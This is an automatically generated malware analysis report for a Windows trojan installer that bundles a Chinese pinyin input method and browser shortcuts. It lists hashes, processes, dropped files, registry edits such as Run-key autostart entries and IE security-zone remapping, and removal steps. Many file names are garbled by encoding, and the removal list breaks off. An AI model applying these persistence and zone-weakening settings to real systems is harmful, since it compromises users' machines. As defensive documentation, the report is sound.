Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a31d77c4941277b89798cb0197973ae4
SHA1: 6ca7be3bd02363228ceee06b9884df2f7438b949
SHA256: 00affff4ba47d45a04b15bf1c57996efd18f200c0b499dfd8c8c69725688fdb0
SSDeep: 12288:LyXZZthSgM0WupPJdBxrXWT60EQHnxGuT/MI6CV44o:LyXnSgMF4dBxYjkuT/wA44o
Size: 628600 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
install.exe:352
OneDay.exe:340
ksimekusu_zhim_007.exe:680
KS21860.exe:136
%original file name%.exe:1540
CreateShortcut.exe:1500
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process OneDay.exe:340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process ksimekusu_zhim_007.exe:680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄÖ®ÃÂÂÇ˫ƴ.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (826 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\À¶Ìì˫ƴ.ini (912 bytes)
%Program Files%\KS2015010306\V21860\imeunit.exe (4992 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\ÎҵĶÌÓï.ini (24 bytes)
%Program Files%\KS2015010306\V21860\msvcr100.dll (25824 bytes)
%Program Files%\KS2015010306\V21860\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\theme.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015010306\V21860\install.exe (1856 bytes)
%Program Files%\KS2015010306\V21860\imetool.exe (6360 bytes)
%Program Files%\KS2015010306\V21860\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\¹Ì¶¥Ãâ€â€ÃƒÆ’–.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Program Files%\KS2015010306\V21860\msvcp100.dll (14184 bytes)
%Program Files%\KS2015010306\V21860\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÇÄÜABC˫ƴ.ini (686 bytes)
%Program Files%\KS2015010306\V21860\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Program Files%\KS2015010306\V21860\DirectUI.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOS˫ƴ.ini (674 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÃÂÂÞ¸´.lnk (834 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Program Files%\KS2015010306\V21860\KS21860.exe (7192 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄ·ûºÅ.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\˫ƴ.ini (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\öÃâ€ÂØ.lnk (621 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Æ´Òô¼Ó¼Ó˫ƴ.ini (538 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈÃÂÂ˫ƴ.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\õó¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ãâ€â€ÃƒÆ’â€ÂÈ»Âë˫ƴ.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Program Files%\KS2015010306\V21860\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\KS2015010306\V21860\config.exe (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB9.tmp (285959 bytes)
%Program Files%\KS2015010306\V21860\Library.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\nsis.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB8.tmp (0 bytes)
The process %original file name%.exe:1540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\appbd.txt (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\ksimekusu_zhim_007.exe (229152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\Browser_V3.0.1354.0_r_4182_(Build14092214).exe (314625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\CreateShortcut.exe (13850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\OneDay.exe (122112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB3.tmp (19754 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nshB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp (0 bytes)
The process CreateShortcut.exe:1500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Desktop\Ó°ÊÓ´óÈ«.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyB6.tmp (13218 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\hao123ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\Ëѹ·ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\°®ÌÃâ€Â±¦.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsyB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB5.tmp (0 bytes)
Registry activity
The process install.exe:352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Ime File" = "KSIME.IME"
"Layout File" = "kbdus.dll"
[HKU\.DEFAULT\Keyboard Layout\Preload]
"2" = "E0200804"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Layout" = "E0200804"
[HKCU\Keyboard Layout\Preload]
"2" = "E0200804"
[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Layout Text" = "快速拼音输入法"
The process OneDay.exe:340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 3C 26 09 AE 4C D6 81 3D 76 EC 90 33 7C CD A4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
The process ksimekusu_zhim_007.exe:680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Qudao" = "ksimekusu_zhim_007"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxBA.tmp\nsis.dll,"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Count" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Proc" = "KS21860.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayIcon" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
[HKCR\JiSu.file\DefaultIcon]
"(Default)" = "%Program Files%\KS2015010306\V21860\config.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 12 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"UninstallString" = "%Program Files%\KS2015010306\V21860\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"date" = "20150103"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayName" = "¿ìËÙÆ´ÒôÊäÈë·¨ 3.0.3.9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\JiSu.file\shell\open\command]
"(Default)" = "%Program Files%\KS2015010306\V21860\config.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\.wlb]
"(Default)" = "JiSu.file"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"Publisher" = "cxmx, Inc."
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\JiSu.file\shell\open]
"(Default)" = "°²Ãâ€â€Ãƒâ€šÃ‚°Ãƒâ€â€ÃƒÆ’–¿â"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayVersion" = "3.0.3.9"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"InstallDir" = "%Program Files%\KS2015010306\V21860"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"URLInfoAbout" = "http://jiguangshurufa.com/"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 02 B8 43 E3 78 D1 81 C9 07 81 0C 9E 6F 97 7E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\JiSu.file]
"(Default)" = "Ãâ€â€ÃƒÆ’–¿âÎļþ (.wlb)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ksinput.exe]
"(Default)" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\JiSu.file\shell]
"(Default)" = "open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Entry" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file in the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS21860.exe" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file in the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS21860.exe" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process KS21860.exe:136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 F7 4D 38 C6 D9 56 01 BE E1 BF 88 AD 61 87 06"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Config" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
"Count" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"CRand" = "903"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process %original file name%.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 88 C8 C6 4E BF 5E 62 D1 E8 C0 D0 FB BF 07 30"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process CreateShortcut.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 50 A3 89 D3 22 50 E5 DA C4 CB 38 09 66 2D 34"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
Dropped PE files
MD5 | File path |
---|---|
9ec7343e965f1f5da63daa34515be40e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\CreateShortcut.exe |
678e0ebb76fd1af1fce5ac082d682f94 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\Furt.exe |
254f13dfd61c5b7d2119eb2550491e1d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\NSISdl.dll |
cba2bb678b7095db0d11c997c953903c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\OneDay.exe |
144bd6f3a3e1e040ffb03648e49c366d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\ksimekusu_zhim_007.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
install.exe:352
OneDay.exe:340
ksimekusu_zhim_007.exe:680
KS21860.exe:136
%original file name%.exe:1540
CreateShortcut.exe:1500
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄÖ®ÃÂÂÇ˫ƴ.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (826 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\À¶Ìì˫ƴ.ini (912 bytes)
%Program Files%\KS2015010306\V21860\imeunit.exe (4992 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\ÎҵĶÌÓï.ini (24 bytes)
%Program Files%\KS2015010306\V21860\msvcr100.dll (25824 bytes)
%Program Files%\KS2015010306\V21860\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\theme.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015010306\V21860\install.exe (1856 bytes)
%Program Files%\KS2015010306\V21860\imetool.exe (6360 bytes)
%Program Files%\KS2015010306\V21860\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\¹Ì¶¥Ãâ€â€ÃƒÆ’–.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Program Files%\KS2015010306\V21860\msvcp100.dll (14184 bytes)
%Program Files%\KS2015010306\V21860\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÇÄÜABC˫ƴ.ini (686 bytes)
%Program Files%\KS2015010306\V21860\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Program Files%\KS2015010306\V21860\DirectUI.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOS˫ƴ.ini (674 bytes)
